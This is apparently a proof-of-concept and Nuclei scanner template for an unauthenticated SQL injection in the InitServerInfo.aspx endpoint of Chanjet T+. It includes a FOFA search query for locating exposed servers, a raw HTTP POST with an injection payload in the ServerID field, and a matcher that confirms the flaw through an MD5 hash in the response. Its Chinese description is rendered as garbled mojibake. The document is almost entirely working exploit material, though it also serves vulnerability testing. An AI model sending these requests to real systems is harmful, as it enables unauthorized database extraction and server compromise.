³©½ÝͨT+ InitServerInfo.aspx SQL

app="³©½Ýͨ-TPlus"

POST /tplus/UFAQD/InitServerInfo.aspx?preload=1 HTTP/1.1
Host: XXXXXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 113
 
operbtn=create&ServerID=1'%2b(select 1 where 1 in (SELECT sys.fn_varbintohexstr(hashbytes('MD5','123456'))))%2b'1

id: changjietong-InitServerInfo-sql-Injection
info:
  name: ÓÉÓÚ³©½ÝͨT+µÄInitServerInfo.aspx½Ó¿Ú´¦Î´¶ÔÓû§µÄÊäÈë½øÐйýÂ˺ÍУÑé
  author: someone
  severity: critical
  description: ÓÉÓÚ³©½ÝͨT+µÄInitServerInfo.aspx½Ó¿Ú´¦Î´¶ÔÓû§µÄÊäÈë½øÐйýÂ˺ÍУÑ飬δ¾­Éí·ÝÑéÖ¤µÄ¹¥»÷Õß³ýÁË¿ÉÒÔÀûÓà SQL ×¢È멶´»ñÈ¡Êý¾Ý¿âÖеÄÐÅÏ¢£¨ÀýÈ磬¹ÜÀíÔ±ºǫ́ÃÜÂë¡¢Õ¾µãµÄÓû§¸öÈËÐÅÏ¢£©Ö®Í⣬ÉõÖÁÔÚ¸ßȨÏÞµÄÇé¿ö¿ÉÏò·þÎñÆ÷ÖÐдÈëľÂí£¬½øÒ»²½»ñÈ¡·þÎñÆ÷ϵͳȨÏÞ¡£
  reference:
  metadata:
    verified: true
    max-request: 1
    fofa-query: FOFA:app="³©½Ýͨ-TPlus"
  tags: sqli
http:
  - raw:
      - |
        POST /tplus/UFAQD/InitServerInfo.aspx?preload=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Length: 113
        
        operbtn=create&ServerID=1'%2b(select 1 where 1 in (SELECT sys.fn_varbintohexstr(hashbytes('MD5','1'))))%2b'1

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"0xc4ca4238a0b923820dcc509a6f75849b")